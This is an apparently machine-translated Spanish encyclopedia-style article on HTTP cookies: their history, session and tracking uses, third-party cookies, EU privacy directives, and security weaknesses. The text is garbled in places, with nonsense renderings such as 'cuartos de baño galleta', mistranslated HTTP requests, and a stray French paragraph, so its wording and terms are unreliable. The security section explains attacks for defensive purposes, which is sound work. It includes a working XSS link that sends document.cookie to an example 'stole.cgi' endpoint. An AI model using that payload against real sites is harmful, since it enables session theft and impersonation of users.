in definiciones, Wiki

Cookie de Internet: ¿Qué es? Definición, Orígenes, Tipos y Privacidad

¿Cuál es la función de una cookie, qué es y cuáles son los tipos de cookies? 🍪

56.3k Vistas 384 Votos

Cookie de Internet: ¿Qué es? Definición, Orígenes, Tipos y Privacidad
Cookie de Internet: ¿Qué es? Definición, Orígenes, Tipos y Privacidad

Un galleta o galleta web (o Galleta, abreviado como testigo en Quebec) está definido por el protocolo de comunicación HTTP como una secuencia de información enviada por un servidor HTTP a un cliente HTTP, que este último devuelve cada vez que se consulta el mismo servidor HTTP bajo ciertas condiciones.

La cookie es el equivalente a una pequeño archivo de texto almacenado en el terminal del internauta. Existentes desde hace más de 20 años, permiten a los desarrolladores de sitios web almacenar datos de los usuarios para facilitar su navegación y permitir ciertas funcionalidades. Las cookies siempre han sido más o menos controvertidas porque contienen información personal residual que potencialmente puede ser explotada por terceros.

El servidor web lo envía como un encabezado HTTP al navegador web, que lo devuelve sin cambios cada vez que accede al servidor. Una cookie se puede utilizar para una autenticación, una sesión (mantenimiento estatal), y para almacenar información específica sobre el usuario, como las preferencias del sitio o el contenido de un carrito de compras electrónico. El término cookie se deriva de galleta mágica, un concepto muy conocido en la informática UNIX, que inspiró la idea y el nombre de las cookies del navegador. Existen algunas alternativas a las cookies, cada una con sus propios usos, ventajas y desventajas.

Al ser simples archivos de texto, las cookies no son ejecutables. Ellos no son ni spyware ni virus, aunque muchos programas antivirus detectan las cookies de algunos sitios porque permiten rastrear a los usuarios cuando visitan varios sitios. 

La mayoría de los navegadores modernos permiten a los usuarios decidir si aceptar o rechazar las cookies. Los usuarios también pueden elegir cuánto tiempo se almacenan las cookies. Sin embargo, el rechazo total de las cookies inutiliza algunos sitios. Por ejemplo, almacene carritos de compras o sitios que requieran iniciar sesión usando credenciales (nombre de usuario y contraseña).

Indice

Historia

Los cuartos de baño galleta deriva del término inglés galleta mágica, que es un paquete de datos que un programa recibe y devuelve sin cambios. Las cookies ya se usaban en TI cuando Luis Montulli tuvo la idea de usarlos en comunicaciones web en junio 1994. En ese momento, estaba empleado por Netscape Communications, que había desarrollado una aplicación de comercio electrónico para un cliente. Las cookies dieron una solución al problema de la confiabilidad de la implementación del carrito de compras virtual de una tienda.

John Giannandrea y Lou Montulli escribieron la primera especificación de cookies de Netscape ese mismo año. Versión 0.9 beta de Mosaic Netscape, lanzada el 13 de octubre de 1994, integrada tecnología de cookies (ver publicación). El primer uso (no experimental) de cookies fue para determinar si los visitantes del sitio web de Netscape habían visitado el sitio antes. Montulli presentó una solicitud de patente para la tecnología de cookies en 1995 y se concedió la patente estadounidense 5774670. concedido en 1998.

Después de implementarse en Netscape 0.9 beta en 1994, las cookies se integraron en Internet Explorer 2, lanzado en octubre de 1995.

La introducción de cookies aún no ha sido ampliamente conocida por el público. En particular, las cookies se aceptaban por defecto en la configuración del navegador y no se informaba a los usuarios de su presencia. Algunas personas sabían de la existencia de las cookies alrededor del primer trimestre de 1995, pero el público en general solo se dio cuenta de su existencia después de que el Financial Times publicara un artículo el 12 de febrero de 1996. En el mismo año, las cookies recibieron mucha atención de los medios. debido a posibles intrusiones en la privacidad. El tema de las cookies se discutió en dos consultas de la Comisión Federal de Comercio de los Estados Unidos en 1996 y 1997.

El desarrollo de la especificación oficial de cookies ya estaba en marcha. Las primeras discusiones sobre la especificación oficial tuvieron lugar en abril de 1995 en la lista de correo www-talk. Se formó un grupo de trabajo especial del IETF. Brian Behlendorf y David Kristol propusieron, respectivamente, dos propuestas alternativas para introducir el estado en las transacciones HTTP, pero el grupo, dirigido por el propio Kristol, decidió utilizar la especificación de Netscape como punto de partida. En febrero de 1996, el grupo de trabajo determinó que las cookies de terceros eran una amenaza importante para la privacidad. La especificación producida por el grupo finalmente se publicó como RFC 2109.

Desde finales de 2014, vemos un banner sobre cookies en muchos sitios. Hay al menos una extensión del navegador que permite la banner no mostrado.

Tipos de Cookies y Usos

Gestión de sesiones

Las cookies se pueden utilizar para mantener los datos del usuario durante la navegación, pero también durante varias visitas. Las cookies se introdujeron para proporcionar un medio de implementación de carritos de compras electrónicos, un dispositivo virtual en el que el usuario puede acumular los artículos que desea comprar mientras navega por el sitio.

En estos días, las aplicaciones como los carritos de compras almacenan la lista de artículos en una base de datos en un servidor, lo cual es preferible; que guardarlos en la propia cookie. El servidor web envía una cookie que contiene una ID de sesión única. Luego, el navegador web devuelve este ID de sesión en cada solicitud posterior y los artículos en la cesta se guardan y asocian con este mismo ID de sesión único.

El uso frecuente de cookies es útil para iniciar sesión en un sitio con credenciales. En resumen, el servidor web primero envía una cookie que contiene una ID de sesión única. Luego, los usuarios proporcionan sus credenciales (generalmente un nombre de usuario y una contraseña). Luego, la aplicación web autentica la sesión y permite que el usuario acceda al servicio.

Personalización

Las cookies se pueden utilizar para recordar información sobre el usuario de un sitio, con el fin de mostrarle contenido apropiado en el futuro. Por ejemplo, un servidor web puede enviar una cookie que contenga el último nombre de usuario utilizado para iniciar sesión en ese sitio web, de modo que ese nombre de usuario pueda completarse previamente en futuras visitas.

Muchos sitios web utilizan cookies para la personalización en función de las preferencias del usuario. Los usuarios seleccionan sus preferencias en un formulario y las envían al servidor. El servidor codifica las preferencias en una cookie y la envía de vuelta al navegador. Posteriormente, cada vez que el usuario accede a una página de este sitio, el navegador devuelve la cookie y por tanto la lista de preferencias; el servidor puede personalizar la página según las preferencias del usuario. Por ejemplo, el sitio web de Wikipedia permite a sus usuarios elegir la máscara del sitio que prefieran. El buscador de Google permite a sus usuarios (aunque no estén registrados) elegir el número de resultados que quieren ver en cada página de resultados.

Seguimiento

Las cookies de seguimiento se utilizan para realizar un seguimiento de los hábitos de navegación de los usuarios de Internet. Esto también se puede hacer en parte usando la dirección IP de la computadora que hace una solicitud de una página o usando el encabezado HTTP 'referente' que el cliente envía con cada solicitud, pero las cookies permiten una mayor precisión. Esto se puede hacer como en el siguiente ejemplo:

  1. Si el usuario llama a una página en un sitio y la solicitud no contiene una cookie, el servidor asume que esta es la primera página visitada por el usuario. Luego, el servidor crea una cadena aleatoria y la envía al navegador junto con la página solicitada.
  2. A partir de este momento, el navegador enviará automáticamente la cookie cada vez que se acceda a una nueva página del sitio. El servidor enviará la página como de costumbre, pero también registrará la URL de la página llamada, la fecha, la hora de la solicitud y la cookie en un archivo de registro.

Al mirar el archivo de registro, es posible ver qué páginas ha visitado el usuario y en qué orden. Por ejemplo, si el archivo contiene algunas solicitudes realizadas con la cookie id=abc, esto puede establecer que todas estas solicitudes provienen del mismo usuario. La URL solicitada, la fecha y la hora asociadas a las solicitudes permiten realizar un seguimiento de la navegación del usuario.

Las cookies de terceros y las balizas web, que se explican a continuación, también permiten el seguimiento en diferentes sitios. El seguimiento de un solo sitio se utiliza generalmente con fines estadísticos. Por el contrario, las empresas de publicidad suelen utilizar el seguimiento en diferentes sitios que utilizan cookies de terceros para generar perfiles de usuario anónimos (que luego se utilizan para determinar qué anuncios deben mostrarse al usuario, así como para enviarle correos electrónicos correspondientes a estos anuncios: SPAM ).

Las cookies de seguimiento suponen un riesgo de invasión de la privacidad del usuario, pero se pueden eliminar fácilmente. La mayoría de los navegadores modernos incluyen una opción para eliminar automáticamente las cookies persistentes al cerrar la aplicación.

Cookies de terceros

Las imágenes y otros objetos contenidos en una página web pueden residir en servidores diferentes al que aloja la página. Para mostrar la página, el navegador descarga todos estos objetos. La mayoría de los sitios web contienen información de diferentes fuentes. Por ejemplo, si escribe www.example.com en su navegador, a menudo habrá objetos o anuncios en parte de la página que provengan de diferentes fuentes, es decir, de un dominio diferente a www..example.com. Las cookies de "primera parte" son cookies establecidas por el dominio que figura en la barra de direcciones del navegador. Las cookies de terceros son establecidas por uno de los objetos de la página que proviene de un dominio diferente.

De forma predeterminada, los navegadores como Mozilla Firefox, Microsoft Internet Explorer y Opera aceptan cookies de terceros, pero los usuarios pueden cambiar la configuración en las opciones del navegador para bloquearlas. No existe un riesgo de seguridad inherente a las cookies de terceros que habilitan la funcionalidad web, sin embargo, también se utilizan para rastrear a los usuarios. de un sitio a otro.

Herramientas como Ghostery, disponible para todos los navegadores, incluido Google Chrome, pueden bloquear los intercambios entre terceros.

Implementación

Una posible interacción entre un navegador web y el servidor que aloja la página web. El servidor envía una cookie al navegador y el navegador la devuelve cuando llama a otra página.
Una posible interacción entre un navegador web y el servidor que aloja la página web. El servidor envía una cookie al navegador y el navegador la devuelve cuando llama a otra página.

Las cookies son pequeños fragmentos de datos enviados por el servidor web al navegador. El navegador los devuelve sin cambios al servidor, introduciendo estado (memoria de eventos pasados) en la transacción HTTP que de otro modo no tendría estado. Sin cookies, cada recuperación de una página web o un componente de una página web es un evento aislado, independiente de otras solicitudes realizadas al mismo sitio. Además de poder configurarlas el servidor web, las cookies también pueden configurarse mediante lenguajes de secuencias de comandos como JavaScript, si el navegador lo admite y lo autoriza.

La especificación oficial de cookies sugiere que los navegadores deberían poder guardar y reenviar una cantidad mínima de cookies. En concreto, un navegador debería poder almacenar al menos 300 cookies de cuatro kilobytes cada una, y al menos 20 cookies para un único servidor o dominio.

Según el apartado 3.1 de RFC 2965, los nombres de las cookies no distinguen entre mayúsculas y minúsculas.

Una cookie puede especificar la fecha de su caducidad, en cuyo caso la cookie se eliminará en esa fecha. Si la cookie no especifica una fecha de caducidad, la cookie se elimina tan pronto como el usuario abandona su navegador. Por lo tanto, especificar una fecha de caducidad es una forma de hacer que la cookie sobreviva a través de varias sesiones. Por este motivo, se dice que las cookies con fecha de caducidad son persistente. Una aplicación de ejemplo: un sitio minorista podría usar cookies persistentes para registrar los artículos que los usuarios colocaron en su carrito de compras (en realidad, la cookie podría hacer referencia a una entrada guardada en una base de datos en el sitio de venta, y no en su computadora) . Por este medio, si el usuario abandona su navegador sin realizar una compra y vuelve a él más tarde, podrá volver a encontrar los artículos en el carrito. Si estas cookies no dieran una fecha de caducidad, caducarían al cerrar el navegador y se perdería la información sobre el contenido de la cesta.

Las cookies pueden tener un alcance limitado a un dominio, subdominio o ruta específicos en el servidor que las creó.

La transferencia de páginas web se realiza mediante el Protocolo de transferencia de hipertexto (HTTP). Al ignorar las cookies, los navegadores llaman a una página desde los servidores web generalmente enviándoles un texto corto llamado Solicitud HTTP. Por ejemplo, para acceder a la página www.example.org/index.html, los navegadores se conectan al servidor www.example.org y envían una solicitud similar a esta:

OBTENER /index.html HTTP/1.1Host: www.example.org
naveganteel servidor

El servidor responde enviando la página solicitada, precedida de un texto similar, llamándose el conjunto Respuesta HTTP. Este paquete puede contener líneas que instruyen al navegador para que almacene cookies:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: nombre=valor
(página HTML)
naveganteel servidor

El servidor solo envía la línea Set-Cookie, si el servidor quiere que el navegador almacene una cookie. Set-Cookie es una solicitud para que el navegador almacene la cadena nombre=valor y la devuelva en todas las solicitudes futuras al servidor. Si el navegador admite cookies y las cookies están habilitadas en las opciones del navegador, la cookie se incluirá en todas las solicitudes posteriores realizadas al mismo servidor. Por ejemplo, el navegador llama a la página www.example.org/noticias.html enviando la siguiente solicitud al servidor www.example.org:

OBTENER /noticias.html HTTP/1.1Host: www.example.orgCookie: nombre=valorAceptar: */*
naveganteel servidor

Esta es una solicitud de otra página del mismo servidor y se diferencia de la primera porque contiene una cadena que el servidor envió previamente al navegador. Gracias a este medio, el servidor sabe que esta solicitud está vinculada a la anterior. El servidor responde enviando la página llamada y también añadiéndole otras cookies.

El servidor puede cambiar el valor de la cookie enviando una nueva línea Set-Cookie: name=new_value en respuesta a la página llamada. Luego, el navegador reemplaza el valor anterior por el nuevo.

La línea Set-Cookie generalmente la crea un programa CGI u otro lenguaje de secuencias de comandos, no el servidor HTTP. El servidor HTTP (ejemplo: Apache) solo transmitirá el resultado del programa (un documento precedido por el encabezado que contiene las cookies) al navegador.

Las cookies también se pueden configurar mediante JavaScript u otros lenguajes similares que se ejecutan en el navegador, es decir, en el lado del cliente en lugar del lado del servidor. En JavaScript, el objeto document.cookie se usa para este propósito. Por ejemplo, la declaración document.cookie = "temperature=20" crea una cookie llamada "temperature" y con un valor de 20.

Ejemplo de una respuesta HTTP de google.com, que establece una cookie con atributos.
Ejemplo de una respuesta HTTP de google.com, que establece una cookie con atributos.

Además del par nombre/valor, una cookie también puede contener una fecha de caducidad, una ruta, un nombre de dominio y el tipo de conexión prevista, es decir, normal o encriptada. RFC 2965 también define que las cookies deben tener un número de versión obligatorio, pero generalmente se omite. Estas partes de datos siguen al par nombre=nuevo_valor y están separadas por punto y coma. Por ejemplo, el servidor puede crear una cookie enviando una línea Set-Cookie: nombre=nuevo_valor; expira=fecha; camino=/; dominio=.ejemplo.org.

Las cookies caducan y el navegador no las envía al servidor en las siguientes situaciones:

  • Cuando se cierra el navegador, si la cookie no es persistente.
  • Cuando ha pasado la fecha de caducidad de la cookie.
  • Cuando se cambia la fecha de caducidad de la cookie (por el servidor o el script) a una fecha en el pasado.
  • Cuando el navegador borra la cookie a petición del usuario.

La tercera situación permite que los servidores o scripts eliminen explícitamente una cookie. Tenga en cuenta que es posible con el navegador web Google Chrome conocer la fecha de caducidad de una cookie en particular accediendo a la configuración de contenido. Una cookie guardada en una computadora puede muy bien permanecer allí durante varias décadas si no se toma ningún procedimiento para borrarla.

Ideas recibidas

Desde su introducción en Internet, han circulado muchas ideas sobre las cookies en Internet y en los medios de comunicación. En 1998, CIAC, un equipo de monitoreo de incidentes informáticos del Departamento de Energía de los Estados Unidos, determinó que las vulnerabilidades de seguridad de las cookies eran "básicamente inexistentes" y explicó que "la información sobre el origen de sus visitas y los detalles de las páginas web que ha visitado ya existen en los archivos de registro de los servidores web”. En 2005, Jupiter Research publicó los resultados de un estudio, en el que un porcentaje significativo de los encuestados consideró las siguientes afirmaciones:

Las cookies no pueden borrar ni leer información del ordenador del usuario. Sin embargo, las cookies permiten detectar las páginas web visitadas por un usuario en un sitio o conjunto de sitios determinado. Esta información se puede recopilar en un perfil de usuario que se puede usar o revender a terceros, lo que puede plantear serios problemas de privacidad. Algunos perfiles son anónimos, en el sentido de que no contienen información personal, pero incluso esos perfiles pueden ser cuestionables.

Según el mismo estudio, un gran porcentaje de los internautas no sabe cómo eliminar las cookies. Una de las razones por las que la gente no confía en las cookies es que algunos sitios han abusado del aspecto de identificación personal de las cookies y han compartido esta información con otras fuentes. Un gran porcentaje de la publicidad dirigida y el correo electrónico no solicitado, considerado spam, proviene de la información obtenida de las cookies de seguimiento.

Configuración del navegador

La mayoría de los navegadores admiten cookies y permiten al usuario deshabilitarlas. Las opciones más comunes son:

  • Habilitar o deshabilitar las cookies por completo, para que sean aceptadas o bloqueadas constantemente.
  • Permitir al usuario ver las cookies activas en una página determinada, ingresando javascript: alert(document.cookie) en la barra de direcciones del navegador. Algunos navegadores incorporan un administrador de cookies para el usuario que puede ver y eliminar selectivamente las cookies actualmente almacenadas por el navegador.

La mayoría de los navegadores también permiten la eliminación total de datos personales que incluyen cookies. También existen módulos adicionales para controlar los permisos de cookies.

Privacidad y Cookies de Terceros

En este ejemplo ficticio, una empresa de publicidad ha colocado banners en dos sitios web. Al alojar los banners en sus servidores y utilizar cookies de terceros, la empresa de publicidad puede rastrear la navegación del usuario a través de estos dos sitios.

Las cookies tienen implicaciones importantes para la privacidad y el anonimato de los usuarios de la web. Aunque las cookies solo se envían al servidor que las instaló o a un servidor que pertenece al mismo dominio de Internet, una página web puede contener imágenes u otros componentes almacenados en servidores que pertenecen a otros dominios. Las cookies que se establecen durante la recuperación de estos componentes externos se denominan cookies de terceros. Esto incluye cookies de ventanas emergentes no deseadas.

Las empresas de publicidad utilizan cookies de terceros para rastrear a los usuarios en los diferentes sitios que visitan. En particular, una empresa de publicidad puede rastrear a un usuario en todas las páginas donde ha colocado imágenes publicitarias o un píxel de seguimiento. El conocimiento de las páginas visitadas por el usuario permite a la empresa de publicidad orientar las preferencias publicitarias del usuario.

Algunos consideran que la capacidad de crear un perfil de usuario es una invasión de la privacidad, especialmente cuando el seguimiento se realiza en diferentes dominios utilizando cookies de terceros. Por este motivo, algunos países cuentan con legislación sobre cookies.

El gobierno de los Estados Unidos implementó reglas estrictas sobre la colocación de cookies en el año 2000, luego de que se revelara que la Oficina de Políticas de Drogas de la Casa Blanca estaba usando cookies para rastrear las computadoras de los usuarios que ven anuncios de drogas en línea. En 2002, el activista de la privacidad Daniel Brandt descubrió que la CIA dejaba cookies persistentes en las computadoras que habían visitado sus sitios web. Una vez informada de este incumplimiento, la CIA declaró que estas cookies no se enviaban intencionadamente y dejó de instalarlas. El 25 de diciembre de 2005, Brandt descubrió que la Agencia de Seguridad Nacional (NSA) había dejado dos cookies persistentes en las computadoras de los visitantes debido a una actualización de software. Después de ser notificado, la NSA deshabilitó inmediatamente las cookies.

En el Reino Unido, el ley de cookies “, que entró en vigor el 25 de mayo de 2012, obliga a los sitios a declarar sus intenciones, permitiendo así a los usuarios elegir si quieren dejar rastros o no de su paso por Internet. Por lo tanto, pueden protegerse de la orientación publicitaria. Sin embargo, de acuerdo a El guardián, el consentimiento de los internautas no es necesariamente explícito; se han realizado cambios en los términos del consentimiento del usuario, por lo que es así implícito.

Directiva 2002/58 sobre privacidad

La Directiva 202/58 de privacidad y comunicaciones electrónicas, contiene normas sobre el uso de cookies. En particular, el artículo 5, párrafo 3 de esta directiva requiere que el almacenamiento de datos (como cookies) en la computadora del usuario solo pueda realizarse si:

  • se informa al usuario de cómo se utilizan los datos;
  • el usuario tiene la opción de rechazar esta operación de almacenamiento. Sin embargo, este artículo también establece que el almacenamiento de datos por razones técnicas está exento de esta ley.

La directiva, que debía aplicarse a partir de octubre de 2003, se puso en práctica de forma muy imperfecta, según un informe de diciembre de 2004, que también señalaba que determinados Estados miembros (Eslovaquia, Letonia, Grecia, Bélgica y Luxemburgo) aún no habían transpuesto la directiva en el derecho interno.

Según el dictamen del G29 de 2010, esta directiva, que condiciona notablemente el uso de cookies con fines publicitarios comportamentales, al consentimiento explícito del internauta sigue siendo muy mal aplicada. De hecho, la mayoría de los sitios lo hacen de una forma que no cumple con la directiva, limitándose a un simple "banner" que informa del uso de "cookies" sin dar información sobre los usos, sin diferenciar entre cookies "técnicas". cookies de "seguimiento", ni ofrecer una opción real al usuario que desee mantener cookies técnicas (como las cookies de gestión del carrito de la compra) y rechazar las cookies de "seguimiento". De hecho, muchos sitios no funcionan correctamente si se rechazan las cookies, lo que no cumple con la directiva 2002/58 o la directiva 95/46 (Protección de datos personales).

Directiva 2009 / 136 / CE

Este material ha sido actualizado por la Directiva 2009/136/EC del 25 de noviembre de 2009 que establece que "el almacenamiento de información, u obtener acceso a información ya almacenada, en el equipo terminal de un suscriptor o usuario está permitido solo con la condición de que el el suscriptor o usuario ha dado su consentimiento, tras haber recibido, en cumplimiento de la Directiva 95/46/CE, información clara y completa, entre otras, sobre las finalidades del tratamiento”. Por tanto, la nueva directiva refuerza las obligaciones previas a la instalación de cookies en el ordenador del usuario de Internet.

En las consideraciones preliminares de la directiva, el legislador europeo especifica sin embargo: "Cuando sea técnicamente posible y eficaz, de conformidad con las disposiciones pertinentes de la Directiva 95/46/CE, el consentimiento del usuario con respecto al procesamiento podrá expresarse a través del uso de la configuración apropiada de un navegador u otra aplicación”. Pero, de hecho, ningún navegador hasta la fecha permite disociar las cookies técnicas esenciales de las opcionales que deben dejarse a la elección del usuario.

Esta nueva directiva fue transpuesta por los parlamentarios belgas en julio de 2012. Un estudio de 2014 muestra que incluso los parlamentarios tienen dificultades para aplicar las limitaciones de la directiva.

P3P

La especificación P3P incluye la capacidad de un servidor para establecer una política de privacidad, que define qué tipo de información recopila y con qué propósito. Estas políticas incluyen (pero no se limitan a) el uso de la información recopilada mediante cookies. De acuerdo con las definiciones de P3P, un navegador puede aceptar o rechazar las cookies comparando las políticas de privacidad con las preferencias del usuario o preguntándole al usuario, presentando la declaración de privacidad de la política de privacidad declarada por el servidor.

Muchos navegadores, incluidos Apple Safari y Microsoft Internet Explorer versiones 6 y 7, admiten P3P, lo que permite que el navegador determine si acepta el almacenamiento de cookies de terceros. El navegador Opera permite a los usuarios rechazar las cookies de terceros y crear un perfil de seguridad global y específico para los dominios de Internet. Mozilla Firefox versión 2 eliminó la compatibilidad con P3P pero la restableció en la versión 3.

La mayoría de los navegadores pueden bloquear las cookies de terceros para aumentar la privacidad y reducir el seguimiento de anuncios, sin afectar negativamente la experiencia web del usuario. Muchas agencias de publicidad ofrecen una opción optar por no a la publicidad dirigida, configurando una cookie genérica en el navegador que desactiva esta orientación, pero tal solución no es prácticamente efectiva, cuando se respeta, porque esta cookie genérica se borra tan pronto como el usuario elimina estas cookies, lo que cancela la opción fuera de decisión.

Desventajas de las cookies

Además de los problemas de privacidad, las cookies también tienen algunos inconvenientes técnicos. En particulier, ils n'identifient pas toujours exactement les utilisateurs, ils peuvent ralentir la performance des sites lorsque en grand nombre, ils peuvent être utilisés pour des attaques de sécurité et ils sont en oppositions avec le transfert représentatif d'état, style architectural du software.

Identificación imprecisa

Si en un ordenador se utiliza más de un navegador, en cada uno de ellos existe siempre una unidad de almacenamiento independiente para las cookies. Por lo tanto, las cookies no identifican a una persona, sino a la combinación de una cuenta de usuario, una computadora y un navegador web. Por lo tanto, cualquiera puede usar estas cuentas, computadoras o navegadores que tienen la panoplia de cookies. Del mismo modo, las cookies no diferencian entre varios usuarios que comparten la misma cuenta de usuario, computadora y navegador, como en los "cafés de Internet" o cualquier lugar que brinde acceso gratuito a los recursos informáticos.

Pero en la práctica esta afirmación resulta falaz en la mayoría de los casos porque hoy en día un ordenador "personal" (o un smartphone, o una tableta, lo que es peor) es utilizado mayoritariamente por un solo individuo, lo que equivale a apuntar a una persona concreta y a través del volumen de información recopilada llegan a una orientación personalizada incluso si la persona no está "específicamente" identificada.

Una cookie puede ser robada por otra computadora en la red.

Durante el funcionamiento normal, las cookies se envían de vuelta entre el servidor (o un grupo de servidores en el mismo dominio) y el navegador de la computadora del usuario. Dado que las cookies pueden contener información confidencial (nombre de usuario, una contraseña utilizada para la autenticación, etc.), sus valores no deben ser accesibles para otras computadoras. El robo de cookies es un acto de interceptación de cookies por parte de un tercero no autorizado.

Las cookies se pueden robar a través de un rastreador de paquetes en un ataque llamado secuestro de sesión. El tráfico en la red puede ser interceptado y leído por computadoras distintas de las que envían y reciben (especialmente en el espacio Wi-Fi público sin cifrar). Este tráfico incluye cookies enviadas a través de sesiones utilizando el protocolo HTTP simple. Cuando el tráfico de la red no está encriptado, los usuarios maliciosos pueden leer las comunicaciones de otros usuarios en la red utilizando "rastreadores de paquetes".

Este problema se puede solucionar cifrando la conexión entre la computadora del usuario y el servidor usando el protocolo HTTPS. Un servidor puede especificar un bandera segura mientras configura una cookie; el navegador solo lo enviará a través de una línea segura, como una conexión SSL.

Sin embargo, muchos sitios, aunque usan comunicación cifrada HTTPS para la autenticación del usuario (es decir, la página de inicio de sesión), luego envían cookies de sesión y otros datos normalmente, a través de conexiones HTTP no cifradas por razones de eficiencia. Los atacantes pueden así interceptar las cookies de otros usuarios y hacerse pasar por ellos en los sitios apropiados o utilizarlos en ataques de cookies.

Scripting en el sitio: una cookie que solo debe intercambiarse entre el servidor y el cliente se envía a otro tercero.

Otra forma de robar cookies es crear secuencias de comandos en los sitios y hacer que el navegador mismo envíe cookies a servidores maliciosos que nunca las reciben. Los navegadores modernos permiten la ejecución de partes de código buscadas desde el servidor. Si se accede a las cookies durante el tiempo de ejecución, sus valores pueden comunicarse de alguna forma a los servidores que no deberían acceder a ellas. Encriptar las cookies antes de que se envíen a través de la red no ayuda a frustrar el ataque.

Los atacantes suelen emplear este tipo de secuencias de comandos en el sitio en sitios que permiten a los usuarios publicar contenido HTML. Al integrar una parte de código compatible en la contribución HTML, un atacante puede recibir cookies de otros usuarios. El conocimiento de estas cookies se puede utilizar conectándose al mismo sitio que utiliza las cookies robadas, siendo así reconocido como el usuario cuyas cookies fueron robadas.

Una forma de prevenir este tipo de ataques es utilizar el indicador HttpOnly; es una opción, introducida desde la versión 6 de Internet Explorer en PHP desde la versión 5.2.0 que está prevista para hacer que la cookie sea inaccesible para el cliente cercano al script. Sin embargo, los desarrolladores web deben tener esto en cuenta en el desarrollo de su sitio para que sean inmunes a las secuencias de comandos en el sitio.

Otra amenaza de seguridad utilizada es la fabricación de demanda en el sitio.

La especificación técnica oficial permite que las cookies se devuelvan solo a los servidores del dominio en el que se originaron. Sin embargo, el valor de las cookies se puede enviar a otros servidores utilizando medios distintos a los encabezados de cookies.

En particular, los lenguajes de secuencias de comandos como JavaScript generalmente pueden acceder a los valores de las cookies y pueden enviar valores arbitrarios a cualquier servidor en Internet. Esta capacidad de secuencias de comandos se utiliza desde sitios web que permiten a los usuarios publicar contenido HTML para que otros usuarios lo vean.

Por ejemplo, un atacante que opere en el dominio example.com podría publicar un comentario que contenga el siguiente enlace que apunte a un blog popular que de otro modo no controlaría:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Cuando otro usuario hace clic en este enlace, el navegador ejecuta la parte del código del atributo onclick, por lo que reemplaza la cadena document.cookie con la lista de cookies de usuario que están activas para esta página. Por lo tanto, esta lista de cookies se envía al servidor de ejemplo.com y, por lo tanto, el atacante puede recopilar las cookies de este usuario.

Este tipo de ataque es difícil de detectar por parte del usuario porque el script proviene del mismo dominio que configuró la cookie y la operación para enviar los valores parece estar autorizada por ese dominio. Se considera que es responsabilidad de los administradores que operan este tipo de sitios establecer restricciones que impidan la publicación de código malicioso.

Las cookies no son directamente visibles para los programas del lado del cliente como JavaScript si se enviaron con la marca HttpOnly. Desde el punto de vista del servidor, la única diferencia es que en la línea del encabezado Set-Cookie se agrega un nuevo campo que contiene la cadena HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Cuando el navegador recibe una cookie de este tipo, se supone que la usa normalmente en el siguiente intercambio HTTP, pero sin que sea visible para los scripts ejecutados en el lado del cliente. La bandera HttpOnly no forma parte de ninguna especificación técnica oficial y no está implementada en todos los navegadores. Tenga en cuenta que actualmente no hay forma de evitar la lectura y escritura de cookies de sesión mediante el método XMLHTTPRequest.

Modificación de contenido: un atacante envía una cookie no válida a un servidor, posiblemente hecha a partir de una cookie válida enviada por el servidor.

Tan pronto como las cookies deban almacenarse y devolverse sin cambios al servidor, un atacante puede modificar el valor de las cookies antes de que se envíen de vuelta al servidor. Por ejemplo, si una cookie contiene el valor total que el usuario tiene que pagar por los artículos colocados en el carrito de compras de la tienda, cambiar este valor expone al servidor al riesgo de cobrarle al atacante menos del precio inicial. El proceso de modificación del valor de las cookies se llama envenenamiento por galletas y se puede usar después del robo de cookies para que el ataque sea persistente.

En el método de anulación de cookies, el atacante aprovecha una falla del navegador para enviar una cookie no válida al servidor.

Sin embargo, la mayoría de los sitios web solo almacenan una ID de sesión, un número único generado aleatoriamente que se usa para identificar al usuario de la sesión, en la cookie misma, mientras que el resto de la información se almacena en el servidor. En este caso, este problema se resuelve en gran medida.

Se espera que cada sitio tenga sus propias cookies, por lo que un sitio no debería poder modificar o crear cookies asociadas con otro sitio. Una falla de seguridad del navegador web puede permitir que los sitios maliciosos rompan esta regla. La explotación de tal defecto se conoce comúnmente como cocina entre sitios. El propósito de tales ataques puede ser el robo de ID de sesión.

Los usuarios deben utilizar las últimas versiones de los navegadores web en los que estas vulnerabilidades están prácticamente eliminadas.

Estado de conflicto entre el cliente y el servidor

El uso de cookies puede generar una contradicción entre el estado del cliente y el estado almacenado en la cookie. Si el usuario adquiere una cookie y hace clic en el botón "Atrás" del navegador, el estado del navegador generalmente no es el mismo que antes de esta adquisición. Por ejemplo, si la cesta de una tienda online se crea mediante cookies, el contenido de la cesta no puede cambiar cuando el usuario vuelve al historial de navegación: si el usuario pulsa un botón para añadir un artículo a su cesta y hace clic en el botón "Volver botón, el artículo se queda en este. Esta puede no ser la intención del usuario, quien ciertamente quiere cancelar la adición del artículo. Esto puede generar falta de confiabilidad, confusión y errores. Por lo tanto, los desarrolladores web deben ser conscientes de este problema e implementar medidas para manejar situaciones como esta.

Las cookies persistentes han sido criticadas por expertos en seguridad de la privacidad por no estar configuradas para caducar lo suficientemente pronto, lo que permite que los sitios web rastreen a los usuarios y creen su perfil con el tiempo. Este aspecto de las cookies también es parte del problema del secuestro de sesión, porque una cookie persistente robada puede usarse para hacerse pasar por un usuario durante un período de tiempo considerable.

Lea también: GAFAM: ¿Quiénes son? ¿Por qué son (a veces) tan aterradores?

Alternativas a las cookies

Algunas operaciones que se pueden realizar con cookies también se pueden realizar con otros mecanismos que evitan las cookies o recrean las cookies eliminadas, lo que crea problemas de privacidad de la misma manera (o a veces peor porque son invisibles) que las cookies.

Dirección IP

Los usuarios pueden ser rastreados con la dirección IP de la computadora que llama a la página. Esta técnica ha estado disponible desde la introducción de la World Wide Web, a medida que se descargan las páginas, el servidor solicita la dirección IP de la computadora que ejecuta el navegador o el proxy, si no se usa ninguno. El servidor puede rastrear esta información ya sea que haya o no cookies en uso. Sin embargo, estas direcciones suelen ser menos fiables para identificar a un usuario que las cookies porque varios usuarios pueden compartir ordenadores y proxies, y el mismo ordenador puede recibir una dirección IP diferente en cada sesión de trabajo (como suele ser el caso de las conexiones telefónicas). .

El seguimiento por direcciones IP puede ser confiable en algunas situaciones, como las conexiones de banda ancha que mantienen la misma dirección IP durante mucho tiempo, siempre que esté encendido.

Algunos sistemas como Tor están diseñados para mantener el anonimato de Internet y hacer que el seguimiento por dirección IP sea imposible o poco práctico.

Enlance

